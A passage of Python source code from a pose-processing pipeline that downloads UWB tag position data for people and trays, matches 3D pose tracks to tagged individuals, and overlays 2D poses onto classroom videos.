pose_processing_subdirectory=pose_processing_subdirectory
)
logger.info('Generating list of time segments')
time_segment_start_list = process_pose_data.local_io.generate_time_segment_start_list(
start=start,
end=end
)
num_time_segments = len(time_segment_start_list)
num_minutes = (end - start).total_seconds()/60
logger.info('Downloading people position data for {} time segments spanning {:.3f} minutes: {} to {}'.format(
num_time_segments,
num_minutes,
time_segment_start_list[0].isoformat(),
time_segment_start_list[-1].isoformat()
))
logger.info('Fetching person tag info from Honeycomb for specified environment and time span')
person_tag_info_df = honeycomb_io.fetch_person_tag_info(
start=start,
end=end,
environment_id=environment_id,
chunk_size=chunk_size,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
device_ids = person_tag_info_df['device_id'].unique().tolist()
assignment_ids = person_tag_info_df.index.tolist()
logger.info('Found {} person tags for specified environment and time span'.format(
len(device_ids)
))
if source_objects == 'position_objects':
logger.info('Fetching position objects for these tags and specified start/end and writing to local files')
if task_progress_bar:
if notebook:
time_segment_start_iterator = tqdm.notebook.tqdm(time_segment_start_list)
else:
time_segment_start_iterator = tqdm.tqdm(time_segment_start_list)
else:
time_segment_start_iterator = time_segment_start_list
for time_segment_start in time_segment_start_iterator:
position_data_df = honeycomb_io.fetch_cuwb_position_data(
start=time_segment_start - datetime.timedelta(milliseconds=500),
end=time_segment_start + datetime.timedelta(milliseconds=10500),
device_ids=device_ids,
environment_id=None,
environment_name=None,
device_types=['UWBTAG'],
output_format='dataframe',
sort_arguments=None,
chunk_size=1000,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
# There seem to be some duplicates in honeycomb
if position_data_df.duplicated(subset=set(position_data_df.columns).difference(['socket_read_time'])).any():
logger.warning('Duplicate position records found in time segment {}. Deleting duplicates.'.format(
time_segment_start.isoformat()
))
position_data_df.drop_duplicates(
subset=set(position_data_df.columns).difference(['socket_read_time']),
inplace=True
)
if len(position_data_df) == 0:
continue
position_data_df = (
position_data_df
.join(
(
person_tag_info_df.set_index('device_id')
.reindex(columns=['person_id'])
),
on='device_id'
)
.rename(columns={
'x': 'x_position',
'y': 'y_position',
'z': 'z_position'
})
.reindex(columns=[
'timestamp',
'person_id',
'x_position',
'y_position',
'z_position'
])
)
position_data_df = poseconnect.identify.resample_sensor_data(
sensor_data=position_data_df,
id_field_names=[
'person_id'
],
interpolation_field_names=[
'x_position',
'y_position',
'z_position'
],
timestamp_field_name='timestamp'
)
position_data_df = position_data_df.loc[
(position_data_df['timestamp'] >= time_segment_start) &
(position_data_df['timestamp'] < time_segment_start + datetime.timedelta(seconds=10))
]
process_pose_data.local_io.write_data_local(
data_object=position_data_df,
base_dir=base_dir,
pipeline_stage='download_position_data',
environment_id=environment_id,
filename_stem='position_data',
inference_id=download_position_data_inference_id,
time_segment_start=time_segment_start,
object_type='dataframe',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
elif source_objects == 'datapoints':
logger.info('Fetching UWB datapoint IDs for these tags and specified datapoint timestamp min/max')
data_ids = honeycomb_io.fetch_uwb_data_ids(
datapoint_timestamp_min=datapoint_timestamp_min,
datapoint_timestamp_max=datapoint_timestamp_max,
assignment_ids=assignment_ids,
chunk_size=chunk_size,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
logger.info('Found {} UWB datapoint IDs for these tags and specified datapoint timestamp min/max'.format(
len(data_ids)
))
logger.info('Fetching position data from each of these UWB datapoints and writing to local files')
if task_progress_bar:
if notebook:
data_id_iterator = tqdm.notebook.tqdm(data_ids)
else:
data_id_iterator = tqdm.tqdm(data_ids)
else:
data_id_iterator = data_ids
for data_id in data_id_iterator:
position_data_df = honeycomb_io.fetch_uwb_data_data_id(
data_id=data_id,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
if len(position_data_df) == 0:
continue
position_data_df = honeycomb_io.extract_position_data(
df=position_data_df
)
if len(position_data_df) == 0:
continue
position_data_df = poseconnect.identify.resample_sensor_data(
sensor_data=position_data_df,
id_field_names=[
'assignment_id',
'object_id',
'serial_number',
],
interpolation_field_names=[
'x_position',
'y_position',
'z_position'
],
timestamp_field_name='timestamp'
)
position_data_df = honeycomb_io.add_person_tag_info(
uwb_data_df=position_data_df,
person_tag_info_df=person_tag_info_df
)
for time_segment_start in time_segment_start_list:
position_data_time_segment_df = position_data_df.loc[
(position_data_df['timestamp'] >= time_segment_start) &
(position_data_df['timestamp'] < time_segment_start + datetime.timedelta(seconds=10))
].reset_index(drop=True)
if len(position_data_time_segment_df) == 0:
continue
process_pose_data.local_io.write_data_local(
data_object=position_data_time_segment_df,
base_dir=base_dir,
pipeline_stage='download_position_data',
environment_id=environment_id,
filename_stem='position_data',
inference_id=download_position_data_inference_id,
time_segment_start=time_segment_start,
object_type='dataframe',
append=True,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
else:
raise ValueError('Source object specification \'{}\' not recognized'.format(
source_objects
))
processing_time = time.time() - processing_start
logger.info('Downloaded {:.3f} minutes of position data in {:.3f} minutes (ratio of {:.3f})'.format(
num_minutes,
processing_time/60,
(processing_time/60)/num_minutes
))
return download_position_data_inference_id
def download_position_data_trays_by_datapoint(
start,
end,
base_dir,
environment_id,
source_objects='position_objects',
datapoint_timestamp_min=None,
datapoint_timestamp_max=None,
pose_processing_subdirectory='pose_processing',
chunk_size=100,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None,
task_progress_bar=False,
notebook=False
):
"""
Fetches UWB position data for trays from Honeycomb and writes it back to local files.
The main function, download_position_data_by_datapoint(), focuses on
people positions because those are what is needed for pose track
identification. The equivalent function for trays is included here to kep
things parallel and because some downstream visualizations require both.
If source data is set to \'datapoints\', function will pull the data from
legacy datapoint objects. In this case, user must specify
\'datapoint_timestamp_min\' and \'datapoint_timestamp_max\' in addition to
\'start\' and \'end\'. Determination of minimum and maximum datapoint
timestamps for a given start and end time is tricky, because the timestamp
on a UWB datapoint typically captures when the data in that datapoint begins
but the duration of the data in that datapoint is less predictable
(typically about 30 minutes). For this reason, the script asks the user to
explicitly specify minimum and maximum datapoint timestamps rather than
calculating them from the specified start and end times. A reasonable
practice is to set the minimum datapoint timestamp to be about 40 minutes
less than the start time and to set the maximum datapoint timestamp to be
equal to the end time.
Output data is organized into 10 second segments (mirroring videos) and
saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/download_position_data_trays/ENVIRONMENT_ID/YYYY/MM/DD/HH-MM-SS/position_data_INFERENCE_ID.pkl\'.
Output metadata is saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/download_position_data_trays/ENVIRONMENT_ID/download_position_data_metadata_INFERENCE_ID.pkl\'
Args:
datapoint_timestamp_min (datetime): Minimum UWB data datapoint timestamp to fetch
datapoint_timestamp_max (datetime): Maximum UWB data datapoint timestamp to fetch
start (datetime): Start of position data to fetch
end (datetime): End of position data to fetch
base_dir: Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
source_objects (str): Source data in Honeycomb (either \'position_objects\' or \'datapoints\') (default is \'position_objects\')
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
chunk_size (int): Maximum number of records to pull with Honeycomb request (default is 100)
client (MinimalHoneycombClient): Honeycomb client (otherwise generates one) (default is None)
uri (str): Honeycomb URI (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
token_uri (str): Honeycomb token URI (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
audience (str): Honeycomb audience (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
client_id (str): Honeycomb client ID (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
client_secret (str): Honeycomb client secret (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
task_progress_bar (bool): Boolean indicating whether script should display an overall progress bar (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
Returns:
(str) Locally-generated inference ID for this run (identifies output data)
"""
if start.tzinfo is None:
logger.info('Specified start is timezone-naive. Assuming UTC')
start=start.replace(tzinfo=datetime.timezone.utc)
if end.tzinfo is None:
logger.info('Specified end is timezone-naive. Assuming UTC')
end=end.replace(tzinfo=datetime.timezone.utc)
if datapoint_timestamp_min is not None and datapoint_timestamp_min.tzinfo is None:
logger.info('Specified minimum datapoint timestamp is timezone-naive. Assuming UTC')
datapoint_timestamp_min=datapoint_timestamp_min.replace(tzinfo=datetime.timezone.utc)
if datapoint_timestamp_max is not None and datapoint_timestamp_max.tzinfo is None:
logger.info('Specified maximum datapoint timestamp is timezone-naive. Assuming UTC')
datapoint_timestamp_max=datapoint_timestamp_max.replace(tzinfo=datetime.timezone.utc)
logger.info('Downloading tray position data from Honeycomb. Base directory: {}. Pose processing data subdirectory: {}. Environment ID: {}. Start: {}. End: {}'.format(
base_dir,
pose_processing_subdirectory,
environment_id,
start,
end
))
processing_start = time.time()
logger.info('Generating metadata')
download_position_data_metadata = generate_metadata(
environment_id=environment_id,
pipeline_stage='download_position_data_trays',
parameters={
'datapoint_timestamp_min': datapoint_timestamp_min,
'datapoint_timestamp_max': datapoint_timestamp_max,
'start': start,
'end': end
}
)
download_position_data_trays_inference_id = download_position_data_metadata.get('inference_id')
logger.info('Writing inference metadata to local file')
process_pose_data.local_io.write_data_local(
data_object=download_position_data_metadata,
base_dir=base_dir,
pipeline_stage='download_position_data_trays',
environment_id=environment_id,
filename_stem='download_position_data_trays_metadata',
inference_id=download_position_data_metadata['inference_id'],
time_segment_start=None,
object_type='dict',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
logger.info('Generating list of time segments')
time_segment_start_list = process_pose_data.local_io.generate_time_segment_start_list(
start=start,
end=end
)
num_time_segments = len(time_segment_start_list)
num_minutes = (end - start).total_seconds()/60
logger.info('Downloading tray position data for {} time segments spanning {:.3f} minutes: {} to {}'.format(
num_time_segments,
num_minutes,
time_segment_start_list[0].isoformat(),
time_segment_start_list[-1].isoformat()
))
logger.info('Fetching tray tag info from Honeycomb for specified environment and time span')
tag_info = honeycomb_io.fetch_tag_info(
environment_id=environment_id,
environment_name=None,
start=start,
end=end,
chunk_size=chunk_size,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
tray_info = tag_info.loc[tag_info['entity_type'] == 'Tray'].copy()
device_ids = tray_info.index.unique().tolist()
assignment_ids = tray_info['assignment_id'].tolist()
logger.info('Found {} tray tags for specified environment and time span'.format(
len(device_ids)
))
if source_objects == 'position_objects':
logger.info('Fetching position objects for these tags and specified start/end and writing to local files')
if task_progress_bar:
if notebook:
time_segment_start_iterator = tqdm.notebook.tqdm(time_segment_start_list)
else:
time_segment_start_iterator = tqdm.tqdm(time_segment_start_list)
else:
time_segment_start_iterator = time_segment_start_list
for time_segment_start in time_segment_start_iterator:
position_data_df = honeycomb_io.fetch_cuwb_position_data(
start=time_segment_start - datetime.timedelta(milliseconds=500),
end=time_segment_start + datetime.timedelta(milliseconds=10500),
device_ids=device_ids,
environment_id=None,
environment_name=None,
device_types=['UWBTAG'],
output_format='dataframe',
sort_arguments=None,
chunk_size=1000,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
# There seem to be some duplicates in honeycomb
if position_data_df.duplicated(subset=set(position_data_df.columns).difference(['socket_read_time'])).any():
logger.warning('Duplicate position records found in time segment {}. Deleting duplicates.'.format(
time_segment_start.isoformat()
))
position_data_df.drop_duplicates(
subset=set(position_data_df.columns).difference(['socket_read_time']),
inplace=True
)
if len(position_data_df) == 0:
continue
position_data_df = (
position_data_df
.join(
(
tray_info
.reindex(columns=['tray_id', 'material_id'])
),
on='device_id'
)
.rename(columns={
'x': 'x_position',
'y': 'y_position',
'z': 'z_position'
})
.reindex(columns=[
'timestamp',
'tray_id',
'material_id',
'x_position',
'y_position',
'z_position'
])
)
position_data_df = poseconnect.identify.resample_sensor_data(
sensor_data=position_data_df,
id_field_names=[
'tray_id',
'material_id'
],
interpolation_field_names=[
'x_position',
'y_position',
'z_position'
],
timestamp_field_name='timestamp'
)
position_data_df = position_data_df.loc[
(position_data_df['timestamp'] >= time_segment_start) &
(position_data_df['timestamp'] < time_segment_start + datetime.timedelta(seconds=10))
]
process_pose_data.local_io.write_data_local(
data_object=position_data_df,
base_dir=base_dir,
pipeline_stage='download_position_data_trays',
environment_id=environment_id,
filename_stem='position_data_trays',
inference_id=download_position_data_trays_inference_id,
time_segment_start=time_segment_start,
object_type='dataframe',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
elif source_objects == 'datapoints':
logger.info('Fetching UWB datapoint IDs for these tags and specified datapoint timestamp min/max')
data_ids = honeycomb_io.fetch_uwb_data_ids(
datapoint_timestamp_min=datapoint_timestamp_min,
datapoint_timestamp_max=datapoint_timestamp_max,
assignment_ids=assignment_ids,
chunk_size=chunk_size,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
logger.info('Found {} UWB datapoint IDs for these tags and specified datapoint timestamp min/max'.format(
len(data_ids)
))
logger.info('Fetching position data from each of these UWB datapoints and writing to local files')
if task_progress_bar:
if notebook:
data_id_iterator = tqdm.notebook.tqdm(data_ids)
else:
data_id_iterator = tqdm.tqdm(data_ids)
else:
data_id_iterator = data_ids
for data_id in data_id_iterator:
position_data_df = honeycomb_io.fetch_uwb_data_data_id(
data_id=data_id,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
if len(position_data_df) == 0:
continue
position_data_df = honeycomb_io.extract_position_data(
df=position_data_df
)
if len(position_data_df) == 0:
continue
position_data_df = poseconnect.identify.resample_sensor_data(
sensor_data=position_data_df,
id_field_names=[
'assignment_id',
'object_id',
'serial_number',
],
interpolation_field_names=[
'x_position',
'y_position',
'z_position'
],
timestamp_field_name='timestamp'
)
position_data_df = position_data_df.join(
(
tag_info
.set_index('assignment_id')
.reindex(columns=['tray_id', 'material_id'])
),
how='inner',
on='assignment_id'
)
for time_segment_start in time_segment_start_list:
position_data_time_segment_df = position_data_df.loc[
(position_data_df['timestamp'] >= time_segment_start) &
(position_data_df['timestamp'] < time_segment_start + datetime.timedelta(seconds=10))
].reset_index(drop=True)
if len(position_data_time_segment_df) == 0:
continue
process_pose_data.local_io.write_data_local(
data_object=position_data_time_segment_df,
base_dir=base_dir,
pipeline_stage='download_position_data_trays',
environment_id=environment_id,
filename_stem='position_data_trays',
inference_id=download_position_data_inference_id,
time_segment_start=time_segment_start,
object_type='dataframe',
append=True,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
else:
raise ValueError('Source object specification \'{}\' not recognized'.format(
source_objects
))
processing_time = time.time() - processing_start
logger.info('Downloaded {:.3f} minutes of position data in {:.3f} minutes (ratio of {:.3f})'.format(
num_minutes,
processing_time/60,
(processing_time/60)/num_minutes
))
return download_position_data_trays_inference_id
def identify_pose_tracks_3d_local_by_segment(
base_dir,
environment_id,
download_position_data_inference_id,
pose_track_3d_interpolation_inference_id,
sensor_position_keypoint_index=None,
active_person_ids=None,
ignore_z=False,
min_fraction_matched=0.5,
max_distance=None,
return_match_statistics=False,
pose_processing_subdirectory='pose_processing',
task_progress_bar=False,
notebook=False
):
"""
Fetches 3D pose and pose track data and UWB position data from local files, matches pose tracks to people, and writes output back to local files.
Input data is assumed to be organized as specified by output of
reconstruct_poses_3d_local_by_time_segment(),
generate_pose_tracks_3d_local_by_time_segment(),
interpolate_pose_tracks_3d_local_by_pose_track(), and
download_position_data_by_datapoint().
The script looks up the inference IDs for the 3D pose tracks and 3D poses by
inspecting the metadata from the pose track interpolation run.
The sensor_position_keypoint_index can be an integer (same sensor position
for all people) a dictionary with person IDs as keys and sensor positions as
values (different sensor positions for different people) or None (uses
median keypoint for each person).
If active person IDs are not specified, script assumes all sensors are
assigned to people are available to match.
Output data is saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_track_3d_identification/ENVIRONMENT_ID/pose_track_3d_identification_INFERENCE_ID.pkl\'.
Output metadata is saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_track_3d_identificationn/ENVIRONMENT_ID/pose_track_3d_identification_metadata_INFERENCE_ID.pkl\'
Args:
base_dir: Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
download_position_data_inference_id (str): Inference ID for source position data
pose_track_3d_interpolation_inference_id_id (str): Inference ID for source pose track data
sensor_position_keypoint_index (int or dict): Index of keypoint(s) corresponding to UWB sensor on each person (default: None)
active_person_ids (sequence of str): List of Honeycomb person IDs for people known to be wearing active tags (default is None)
ignore_z (bool): Boolean indicating whether to ignore z dimension when comparing pose and sensor positions (default is False)
min_fraction_matched (float): Minimum fraction of poses in track which must match person for track to be identified as person (default is 0.5)
return_match_statistics (bool): Boolean indicating whether algorithm should return detailed match statistics along with inference ID (defaul is False)
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
task_progress_bar (bool): Boolean indicating whether script should display an overall progress bar (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
Returns:
(str) Locally-generated inference ID for this run (identifies output data)
(dataframe) Detailed match statistics (if requested)
"""
pose_track_3d_interpolation_metadata = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='pose_track_3d_interpolation',
environment_id=environment_id,
filename_stem='pose_track_3d_interpolation_metadata',
inference_ids=pose_track_3d_interpolation_inference_id,
data_ids=None,
sort_field=None,
time_segment_start=None,
object_type='dict',
pose_processing_subdirectory=pose_processing_subdirectory
)
start = pose_track_3d_interpolation_metadata['parameters']['start']
end = pose_track_3d_interpolation_metadata['parameters']['end']
pose_reconstruction_3d_inference_id = pose_track_3d_interpolation_metadata['parameters']['pose_reconstruction_3d_inference_id']
pose_tracking_3d_inference_id = pose_track_3d_interpolation_metadata['parameters']['pose_tracking_3d_inference_id']
logger.info('Identifying 3D pose tracks from local interpolated 3D pose track data and local UWB position data. Base directory: {}. Pose processing data subdirectory: {}. Environment ID: {}.'.format(
base_dir,
pose_processing_subdirectory,
environment_id
))
processing_start = time.time()
logger.info('Generating metadata')
pose_track_3d_identification_metadata = generate_metadata(
environment_id=environment_id,
pipeline_stage='pose_track_3d_identification',
parameters={
'pose_reconstruction_3d_inference_id': pose_reconstruction_3d_inference_id,
'pose_tracking_3d_inference_id': pose_tracking_3d_inference_id,
'pose_track_3d_interpolation_inference_id': pose_track_3d_interpolation_inference_id,
'start': start,
'end': end,
'sensor_position_keypoint_index': sensor_position_keypoint_index,
'active_person_ids': active_person_ids,
'ignore_z': ignore_z,
'min_fraction_matched': min_fraction_matched,
'return_match_statistics': return_match_statistics
}
)
logger.info('Writing inference metadata to local file')
process_pose_data.local_io.write_data_local(
data_object=pose_track_3d_identification_metadata,
base_dir=base_dir,
pipeline_stage='pose_track_3d_identification',
environment_id=environment_id,
filename_stem='pose_track_3d_identification_metadata',
inference_id=pose_track_3d_identification_metadata['inference_id'],
time_segment_start=None,
object_type='dict',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
pose_track_3d_identification_inference_id = pose_track_3d_identification_metadata['inference_id']
# Fetch pose track data
pose_tracks_3d_before_interpolation = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='pose_tracking_3d',
environment_id=environment_id,
filename_stem='pose_tracks_3d',
inference_ids=pose_tracking_3d_inference_id,
data_ids=None,
sort_field=None,
time_segment_start=None,
object_type='dict',
pose_processing_subdirectory=pose_processing_subdirectory
)
pose_tracks_3d_from_interpolation = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='pose_tracking_3d',
environment_id=environment_id,
filename_stem='pose_tracks_3d',
inference_ids=pose_track_3d_interpolation_inference_id,
data_ids=None,
sort_field=None,
time_segment_start=None,
object_type='dict',
pose_processing_subdirectory=pose_processing_subdirectory
)
pose_3d_ids_with_tracks_before_interpolation_df = process_pose_data.local_io.convert_pose_tracks_3d_to_df(
pose_tracks_3d=pose_tracks_3d_before_interpolation
)
pose_3d_ids_with_tracks_from_interpolation_df = process_pose_data.local_io.convert_pose_tracks_3d_to_df(
pose_tracks_3d=pose_tracks_3d_from_interpolation
)
pose_3d_ids_with_tracks_df = pd.concat(
(pose_3d_ids_with_tracks_before_interpolation_df, pose_3d_ids_with_tracks_from_interpolation_df)
).sort_values('pose_track_3d_id')
logger.info('Generating list of time segments')
time_segment_start_list = process_pose_data.local_io.generate_time_segment_start_list(
start=start,
end=end
)
num_time_segments = len(time_segment_start_list)
num_minutes = (end - start).total_seconds()/60
logger.info('Identifying pose tracks for {} time segments spanning {:.3f} minutes: {} to {}'.format(
num_time_segments,
num_minutes,
time_segment_start_list[0].isoformat(),
time_segment_start_list[-1].isoformat()
))
if task_progress_bar:
if notebook:
time_segment_start_iterator = tqdm.notebook.tqdm(time_segment_start_list)
else:
time_segment_start_iterator = tqdm.tqdm(time_segment_start_list)
else:
time_segment_start_iterator = time_segment_start_list
pose_identification_time_segment_df_list = list()
if return_match_statistics:
match_statistics_time_segment_df_list = list()
for time_segment_start in time_segment_start_iterator:
# Fetch 3D poses with tracks
poses_3d_time_segment_df = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='pose_reconstruction_3d',
environment_id=environment_id,
filename_stem='poses_3d',
inference_ids=[
pose_reconstruction_3d_inference_id,
pose_track_3d_interpolation_inference_id
],
data_ids=None,
sort_field=None,
time_segment_start=time_segment_start,
object_type='dataframe',
pose_processing_subdirectory='pose_processing'
)
if len(poses_3d_time_segment_df) == 0:
continue
poses_3d_with_tracks_time_segment_df = poses_3d_time_segment_df.join(pose_3d_ids_with_tracks_df, how='inner')
uwb_data_resampled_time_segment_df = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='download_position_data',
environment_id=environment_id,
filename_stem='position_data',
inference_ids=download_position_data_inference_id,
data_ids=None,
sort_field=None,
time_segment_start=time_segment_start,
object_type='dataframe',
pose_processing_subdirectory=pose_processing_subdirectory
)
# Identify poses
if return_match_statistics:
pose_identification_time_segment_df, match_statistics_time_segment_df = poseconnect.identify.generate_pose_identification(
poses_3d_with_tracks=poses_3d_with_tracks_time_segment_df,
sensor_data_resampled=uwb_data_resampled_time_segment_df,
sensor_position_keypoint_index=sensor_position_keypoint_index,
active_person_ids=active_person_ids,
ignore_z=ignore_z,
return_match_statistics=return_match_statistics
)
match_statistics_time_segment_df_list.append(match_statistics_time_segment_df)
else:
pose_identification_time_segment_df = poseconnect.identify.generate_pose_identification(
poses_3d_with_tracks=poses_3d_with_tracks_time_segment_df,
sensor_data_resampled=uwb_data_resampled_time_segment_df,
sensor_position_keypoint_index=sensor_position_keypoint_index,
active_person_ids=active_person_ids,
ignore_z=ignore_z,
max_distance=max_distance,
return_match_statistics=return_match_statistics
)
# Add to list
pose_identification_time_segment_df_list.append(pose_identification_time_segment_df)
pose_identification_df = pd.concat(pose_identification_time_segment_df_list)
pose_track_identification_df = poseconnect.identify.generate_pose_track_identification(
pose_identification=pose_identification_df
)
num_poses_df = pose_3d_ids_with_tracks_df.groupby('pose_track_3d_id').size().to_frame(name='num_poses')
pose_track_identification_df = pose_track_identification_df.join(num_poses_df, on='pose_track_3d_id')
pose_track_identification_df['fraction_matched'] = pose_track_identification_df['max_matches']/pose_track_identification_df['num_poses']
if min_fraction_matched is not None:
pose_track_identification_df = pose_track_identification_df.loc[pose_track_identification_df['fraction_matched'] >= min_fraction_matched]
process_pose_data.local_io.write_data_local(
data_object=pose_track_identification_df,
base_dir=base_dir,
pipeline_stage='pose_track_3d_identification',
environment_id=environment_id,
filename_stem='pose_track_3d_identification',
inference_id=pose_track_3d_identification_inference_id,
time_segment_start=None,
object_type='dataframe',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
processing_time = time.time() - processing_start
logger.info('Identified 3D pose tracks spanning {:.3f} {:.3f} minutes (ratio of {:.3f})'.format(
num_minutes,
processing_time/60,
(processing_time/60)/num_minutes
))
if return_match_statistics:
match_statistics_df = pd.concat(match_statistics_time_segment_df_list)
return pose_track_3d_identification_inference_id, match_statistics_df
return pose_track_3d_identification_inference_id
def overlay_poses_2d_local(
start,
end,
pose_extraction_2d_inference_id,
base_dir,
environment_id,
pose_model_id,
output_directory='./video_overlays',
output_filename_prefix='poses_2d',
camera_assignment_ids=None,
camera_device_types=None,
camera_device_ids=None,
camera_part_numbers=None,
camera_names=None,
camera_serial_numbers=None,
pose_processing_subdirectory='pose_processing',
chunk_size=100,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None,
local_video_directory='./videos',
video_filename_extension='mp4',
camera_calibrations=None,
keypoint_connectors=None,
pose_color='green',
keypoint_radius=3,
keypoint_alpha=0.6,
keypoint_connector_alpha=0.6,
keypoint_connector_linewidth=3,
output_filename_datetime_format='%Y%m%d_%H%M%S_%f',
output_filename_extension='avi',
output_fourcc_string='XVID',
concatenate_videos=True,
delete_individual_clips=True,
parallel=False,
num_parallel_processes=None,
task_progress_bar=False,
segment_progress_bar=False,
notebook=False
):
"""
Fetches 2D pose data from local files and overlays onto classroom videos.
Fetches and overlays onto all video clips that overlap with specified start
and end (e.g., if start is 10:32:56 and end is 10:33:20, returns videos
starting at 10:32:50, 10:33:00 and 10:33:10).
Script performs a logical AND across all camera specifications. If no camera
specifications are given, returns all active cameras in environment (as
determined by camera_device_types).
If keypoint connectors are not specified, script uses default keypoint
connectors for specified pose model.
Colors can be specifed as any string interpretable by
matplotlib.colors.to_hex().
Input data is assumed to be organized as specified by
extract_poses_2d_alphapose_local_by_time_segment().
Args:
start (datetime): Start of video overlay
end (datetime): End of video overlay
pose_extraction_2d_inference_id (str): Inference ID for source position data
base_dir: Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
pose_model_id (str): Honeycomb pose model ID for pose model that defines 2D/3D pose data structure
output_directory (str): Path to output directory (default is \'./video_overlays\')
output_filename_prefix (str): Filename prefix for output files (default is \'poses_2d\')
camera_assignment_ids (sequence of str): List of Honeycomb assignment IDs for target cameras (default is None)
camera_device_types (sequence of str): List of Honeycomb device types for target cameras (default is video_io.DEFAULT_CAMERA_DEVICE_TYPES)
camera_device_ids (sequence of str): List og Honeycomb device IDs for target cameras (default is None)
camera_part_numbers (sequence of str): List of Honeycomb part numbers for target cameras (default is None)
camera_names (sequence of str): List of Honeycomb device names for target cameras (default is None)
camera_serial_numbers (sequence of str): List of Honeycomb device serial numbers for target cameras (default is None)
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
local_video_directory (str): Path to directory where local copies of Honeycomb videos are stored (default is \'./videos\')
video_filename_extension (str): Filename extension for local copies of Honeycomb videos (default is \'mp4\')
camera_calibrations (dict): Dict in format {DEVICE_ID: CAMERA_CALIBRATION_DATA} (default is None)
keypoint_connectors (array): Array of keypoints to connect with lines to form pose image (default is None)
pose_color (str): Color of pose (default is \'green\')
keypoint_radius (int): Radius of keypoins in pixels (default is 3)
keypoint_alpha (float): Alpha value for keypoints (default is 0.6)
keypoint_connector_alpha (float): Alpha value for keypoint connectors (default is 0.6)
keypoint_connector_linewidth (float): Line width for keypoint connectors (default is 3.0)
output_filename_datetime_format (str): Datetime format for output filename (default is \'%Y%m%d_%H%M%S_%f\')
output_filename_extension (str): Filename extension for output (determines file format) (default is \'avi\')
output_fourcc_string (str): FOURCC code for output format (default is \'XVID\')
concatenate_videos (bool): Boolean indicating whether to concatenate videos for each camera into single videos (default is True)
delete_individual_clips (bool): Boolean indicating whether to delete individual clips after concatenating (default is True)
parallel (bool): Boolean indicating whether to use multiple parallel processes (one for each time segment) (default is False)
num_parallel_processes (int): Number of parallel processes in pool (otherwise defaults to number of cores - 1) (default is None)
task_progress_bar (bool): Boolean indicating whether script should display an overall progress bar (default is False)
segment_progress_bar (bool): Boolean indicating whether script should display a progress bar for each clip (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
"""
poses_2d_df = process_pose_data.local_io.fetch_data_local_by_time_segment(
start=start,
end=end,
base_dir=base_dir,
pipeline_stage='pose_extraction_2d',
environment_id=environment_id,
filename_stem='poses_2d',
inference_ids=pose_extraction_2d_inference_id,
data_ids=None,
sort_field=None,
object_type='dataframe',
pose_processing_subdirectory=pose_processing_subdirectory
)
poses_2d_df = process_pose_data.local_io.convert_assignment_ids_to_camera_device_ids(poses_2d_df)
process_pose_data.overlay.overlay_poses(
poses_df=poses_2d_df,
start=start,
end=end,
camera_assignment_ids=camera_assignment_ids,
environment_id=environment_id,
environment_name=None,
camera_device_types=camera_device_types,
camera_device_ids=camera_device_ids,
camera_part_numbers=camera_part_numbers,
camera_names=camera_names,
camera_serial_numbers=camera_serial_numbers,
chunk_size=chunk_size,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret,
local_video_directory=local_video_directory,
video_filename_extension=video_filename_extension,
pose_model_id=pose_model_id,
camera_calibrations=None,
pose_label_column=None,
keypoint_connectors=keypoint_connectors,
pose_color=pose_color,
keypoint_radius=keypoint_radius,
keypoint_alpha=keypoint_alpha,
keypoint_connector_alpha=keypoint_connector_alpha,
keypoint_connector_linewidth=keypoint_connector_linewidth,
output_directory=output_directory,
output_filename_prefix=output_filename_prefix,
output_filename_datetime_format=output_filename_datetime_format,
output_filename_extension=output_filename_extension,
